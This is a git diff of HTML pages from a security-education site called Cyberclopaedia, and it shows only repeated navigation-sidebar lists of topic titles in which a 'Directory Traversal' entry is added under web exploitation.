        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Stack E - - diff --git a/docs/Exploitation/Binary Exploitation/index.html b/docs/Exploitation/Binary Exploitation/index.html index 0371ad76..d597412a 100644 --- a/docs/Exploitation/Binary Exploitation/index.html +++ b/docs/Exploitation/Binary Exploitation/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Binar - - diff --git a/docs/Exploitation/DNS/DNS Cache Poisoning.html b/docs/Exploitation/DNS/DNS Cache Poisoning.html index d3ab7274..150058f5 100644 --- a/docs/Exploitation/DNS/DNS Cache Poisoning.html +++ b/docs/Exploitation/DNS/DNS Cache Poisoning.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
